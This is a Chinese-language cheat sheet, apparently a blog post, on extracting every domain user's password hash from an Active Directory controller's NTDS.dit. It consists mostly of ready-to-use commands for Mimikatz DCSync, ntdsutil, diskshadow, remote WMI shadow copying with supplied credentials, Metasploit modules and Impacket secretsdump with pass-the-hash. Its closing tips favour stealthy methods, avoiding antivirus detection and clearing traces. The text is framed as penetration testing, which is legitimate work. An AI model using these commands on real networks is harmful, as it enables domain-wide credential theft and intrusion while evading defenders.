Dump域内用户Hash姿势集合
字数 825 2025-08-29 08:32:25

域内用户Hash提取技术全集

概述

在渗透测试中,当获得域管理员权限后,提取域内所有用户的密码哈希是常见操作。这些哈希存储在域控制器的NTDS.DIT文件中,包含用户密码哈希、组成员关系等信息。

NTDS.DIT文件位置

默认路径:

C:\Windows\NTDS\NTDS.dit

提取方法分类

1. 使用Mimikatz

DCSync技术

利用目录复制服务(DRS)从NTDS.DIT检索哈希,无需直接访问域控制器。

基本命令:

lsadump::dcsync /domain:域名 /all /csv

提取特定用户:

lsadump::dcsync /domain:域名 /user:用户名

直接提取

在域控制器上执行:

privilege::debug
lsadump::lsa /inject

2. Empire框架

使用DCSync模块:

usemodule credentials/mimikatz/dcsync_hashdump

3. Nishang工具

使用VSS脚本:

Import-Module .\Copy-VSS.ps1
Copy-VSS
Copy-VSS -DestinationDir 目标路径

4. PowerSploit

使用VolumeShadowCopyTools:

Import-Module .\VolumeShadowCopyTools.ps1
New-VolumeShadowCopy -Volume C:\
Get-VolumeShadowCopy

5. Invoke-DCSync

PowerShell脚本:

Invoke-DCSync
Invoke-DCSync -PWDumpFormat

6. NTDSUTIL工具

创建NTDS.dit快照:

ntdsutil
activate instance ntds
ifm
create full 输出路径
quit
quit

7. DiskShadow

使用脚本模式:

diskshadow.exe /s 脚本文件

脚本示例内容:

set context persistent nowriters
add volume c: alias someAlias
create
expose %someAlias% z:
exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit 目标路径\ntds.dit
delete shadows volume %someAlias%
reset

8. WMI远程提取

创建卷影副本:

wmic /node:DC /user:域\用户 /password:密码 process call create "cmd /c vssadmin create shadow /for=C: 2>&1"

复制NTDS.dit:

wmic /node:DC /user:域\用户 /password:密码 process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit 目标路径\ntds.dit 2>&1"

复制SYSTEM文件:

wmic /node:DC /user:域\用户 /password:密码 process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM\ 目标路径\SYSTEM.hive 2>&1"

9. VSSADMIN

基本命令:

vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit 目标路径
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM 目标路径

10. vssown脚本

使用步骤:

cscript vssown.vbs /start
cscript vssown.vbs /create c
cscript vssown.vbs /list
cscript vssown.vbs /delete

11. Metasploit框架

使用模块:

use auxiliary/admin/smb/psexec_ntdsgrab

后渗透模块:

use windows/gather/credentials/domain_hashdump

直接提取:

hashdump

12. fgdump工具

基本使用:

fgdump.exe

查看结果:

type 127.0.0.1.pwdump

13. Impacket工具集

使用secretsdump:

impacket-secretsdump -system SYSTEM文件 -ntds ntds.dit LOCAL

远程提取:

impacket-secretsdump -hashes LMHASH:NTHASH -just-dc 域/DC$@IP

14. NTDSDumpEx工具

基本命令:

NTDSDumpEx.exe -d ntds.dit -s SYSTEM.hive

15. adXtract脚本

使用方式:

./adXtract.sh ntds.dit SYSTEM 域名

注意事项

  1. 大多数方法需要域管理员权限
  2. 直接使用hashdump可能导致域控制器崩溃
  3. fgdump等工具可能被防病毒软件检测
  4. 尽量选择隐蔽的方法如DCSync
  5. 提取后需要SYSTEM文件配合解析NTDS.dit

最佳实践建议

  1. 优先使用DCSync技术(Mimikatz或Empire)
  2. 远程操作时考虑使用WMI或Metasploit模块
  3. 离线解析时使用Impacket工具集
  4. 注意清理操作痕迹
  5. 避免在业务高峰期操作以防影响服务
域内用户Hash提取技术全集 概述 在渗透测试中,当获得域管理员权限后,提取域内所有用户的密码哈希是常见操作。这些哈希存储在域控制器的NTDS.DIT文件中,包含用户密码哈希、组成员关系等信息。 NTDS.DIT文件位置 默认路径: 提取方法分类 1. 使用Mimikatz DCSync技术 利用目录复制服务(DRS)从NTDS.DIT检索哈希,无需直接访问域控制器。 基本命令: 提取特定用户: 直接提取 在域控制器上执行: 2. Empire框架 使用DCSync模块: 3. Nishang工具 使用VSS脚本: 4. PowerSploit 使用VolumeShadowCopyTools: 5. Invoke-DCSync PowerShell脚本: 6. NTDSUTIL工具 创建NTDS.dit快照: 7. DiskShadow 使用脚本模式: 脚本示例内容: 8. WMI远程提取 创建卷影副本: 复制NTDS.dit: 复制SYSTEM文件: 9. VSSADMIN 基本命令: 10. vssown脚本 使用步骤: 11. Metasploit框架 使用模块: 后渗透模块: 直接提取: 12. fgdump工具 基本使用: 查看结果: 13. Impacket工具集 使用secretsdump: 远程提取: 14. NTDSDumpEx工具 基本命令: 15. adXtract脚本 使用方式: 注意事项 大多数方法需要域管理员权限 直接使用hashdump可能导致域控制器崩溃 fgdump等工具可能被防病毒软件检测 尽量选择隐蔽的方法如DCSync 提取后需要SYSTEM文件配合解析NTDS.dit 最佳实践建议 优先使用DCSync技术(Mimikatz或Empire) 远程操作时考虑使用WMI或Metasploit模块 离线解析时使用Impacket工具集 注意清理操作痕迹 避免在业务高峰期操作以防影响服务